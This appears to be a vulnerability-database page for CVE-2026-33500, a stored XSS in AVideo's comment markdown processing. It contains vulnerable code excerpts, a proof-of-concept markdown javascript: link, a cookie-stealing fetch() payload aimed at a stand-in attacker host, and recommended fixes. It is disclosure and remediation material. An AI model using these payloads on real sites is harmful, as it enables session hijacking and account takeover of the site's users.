PHP
CVE-2026-33500
MEDIUM
Severity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
2DescriptionGitHub Advisory
Summary
The fix for CVE-2026-27568 (GHSA-rcqw-6466-3mv7) introduced a custom ParsedownSafeWithLinks class that sanitizes raw HTML <a> and <img> tags in comments, but explicitly disables Parsedown's safeMode. This creates a bypass: markdown link syntax [text](javascript:alert(1)) is processed by Parsedown's inlineLink() method, which does not go through the custom sanitizeATag() sanitization (that only handles raw HTML tags). With safeMode disabled, Parsedown's built-in javascript: URI filtering (sanitiseElement()/filterUnsafeUrlInAttribute()) is also inactive. An attacker can inject stored XSS via comment markdown links.
Details
The original fix (commit ade348ed6) enabled setSafeMode(true), which activated Parsedown's built-in URL scheme filtering. This was then replaced by commit f13587c59 with a custom approach that turned safeMode back off:
objects/functionsSecurity.php:442-446 - safeMode disabled:
function markDownToHTML($text) {
$parsedown = new ParsedownSafeWithLinks();
$parsedown->setSafeMode(false); // line 445 - disables Parsedown's built-in javascript: filtering
$parsedown->setMarkupEscaped(false);
$html = $parsedown->text($text);ParsedownSafeWithLinks (lines 349-440) overrides blockMarkup() and inlineMarkup() to sanitize raw HTML <a> tags via sanitizeATag(), which whitelist-checks the URL scheme:
// sanitizeATag() at line 360 - only allows http(s), mailto, /,
#
if (preg_match('/^(https?:\/\/|mailto:|\/|#)/i', $url)) {
$href = ' href="' . htmlspecialchars($url, ENT_QUOTES) . '"';
}However, this sanitization only runs for raw HTML <a> tags processed through inlineMarkup(). Markdown-syntax links ([text](url)) are handled by Parsedown's core inlineLink() method (vendor/erusev/parsedown/Parsedown.php:1258), which constructs an element array and passes it to element().
vendor/erusev/parsedown/Parsedown.php:1470-1475 - sanitiseElement only runs when safeMode is true:
protected function element(array $Element)
{
if ($this->safeMode) // false - so sanitiseElement() is never called
{
$Element = $this->sanitiseElement($Element);
}sanitiseElement() would have called filterUnsafeUrlInAttribute() which replaces : with %3A for non-whitelisted schemes like javascript:, but it is never invoked.
Data flow:
- User posts comment containing
[Click here](javascript:alert(document.cookie)) xss_esc()applieshtmlspecialchars()- no HTML special chars exist in the payload, stored unchanged- On retrieval,
xss_esc_back()reverses encoding (no-op), thenmarkDownToHTML()converts markdown to<a href="javascript:alert(document.cookie)">Click here</a> - Result stored in
commentWithLinks(objects/comment.php:420) - Rendered directly in DOM via template at
view/videoComments_template.php:15:<p>{commentWithLinks}</p>
PoC
- Log in as any user with comment permission
- Navigate to any video page
- Post a comment with the following markdown:
[Click here for more info](javascript:alert(document.cookie))- The comment is saved and rendered. Any user viewing the video sees "Click here for more info" as a clickable link
- Clicking the link executes
alert(document.cookie)in the victim's browser context
For session hijacking:
[See related video](javascript:fetch('https://attacker.example/steal?c='+document.cookie))Impact
- Session hijacking: Attacker can steal session cookies of any user (including admins) who clicks the comment link, leading to full account takeover
- Scope change (S:C): The XSS executes in the context of the viewing user's session, crossing the trust boundary from the attacker's low-privilege comment context
- Persistence: The payload is stored in the database and triggers for every user who views the page and clicks the link
- UI:R required: The victim must click the link, which limits the severity vs. auto-executing XSS
Recommended Fix
Override inlineLink() in ParsedownSafeWithLinks to apply URL scheme filtering to markdown-generated links:
class ParsedownSafeWithLinks extends Parsedown
{
// ... existing code ...
protected function inlineLink($Excerpt)
{
$Link = parent::inlineLink($Excerpt);
if ($Link === null) {
return null;
}
$href = $Link['element']['attributes']['href'] ?? '';
// Apply the same whitelist as sanitizeATag: only allow http(s), mailto, relative, anchors
if ($href !== '' && !preg_match('/^(https?:\/\/|mailto:|\/|#)/i', $href)) {
$Link['element']['attributes']['href'] = '';
}
return $Link;
}
}Alternatively, re-enable safeMode(true) and find a different approach to allow <a> and <img> tags (e.g., post-processing the safe output to re-inject whitelisted tags).
AnalysisAI
A stored cross-site scripting (XSS) vulnerability exists in AVideo's comment markdown processing, where the fix for a prior XSS issue (CVE-2026-27568) inadvertently disabled Parsedown's safe mode while implementing incomplete custom sanitization. An attacker with comment posting privileges can inject malicious JavaScript via markdown link syntax (e.g., [text](javascript:alert(1))) that executes in the browser context of any user viewing the comment, enabling session hijacking and account takeover. A working proof-of-concept exists and the vulnerability affects all versions of WWBN AVideo using the vulnerable ParsedownSafeWithLinks class (pkg:composer/wwbn_avideo).
Technical ContextAI
The vulnerability stems from improper remediation of CWE-79 (Improper Neutralization of Input During Web Page Generation) in the Parsedown markdown library as implemented by AVideo. Parsedown is a PHP markdown parser that normally provides URL scheme filtering through its safeMode feature, which calls sanitiseElement() to block dangerous protocols like javascript:, data:, and vbscript:. AVideo's custom ParsedownSafeWithLinks class (objects/functionsSecurity.php) overrides blockMarkup() and inlineMarkup() to sanitize raw HTML <a> tags via whitelist regex, but crucially disables safeMode(false) in the markDownToHTML() function. This means markdown-syntax links processed by Parsedown's core inlineLink() method bypass the custom sanitizeATag() logic and never reach sanitiseElement(), leaving javascript: URIs unfiltered. The affected product is identified via CPE pkg:composer/wwbn_avideo and the vulnerability chain involves the comment storage (xss_esc/xss_esc_back) and rendering pipeline (view/videoComments_template.php).
RemediationAI
Apply the vendor's security patch immediately by updating AVideo to the patched version released in response to GHSA-72h5-39r7-r26j (see https://github.com/WWBN/AVideo/security/advisories/GHSA-72h5-39r7-r26j for specific version details). The recommended code-level fix is to override the inlineLink() method in ParsedownSafeWithLinks to apply the same URL scheme whitelist (http(s)://, mailto:, /, #) to markdown-generated links before they are rendered, ensuring javascript: and other dangerous protocols are stripped. Alternatively, re-enable safeMode(true) in markDownToHTML() and refactor the custom sanitization to work alongside Parsedown's built-in filtering rather than replacing it. As a temporary mitigation pending patching, disable comment markdown processing entirely or strip markdown link syntax from comments via content policy, though this degrades user experience. Additionally, implement a Content Security Policy (CSP) header with script-src 'self' to reduce XSS impact even if a payload executes.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-79 – Cross-site Scripting (XSS)
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-72h5-39r7-r26j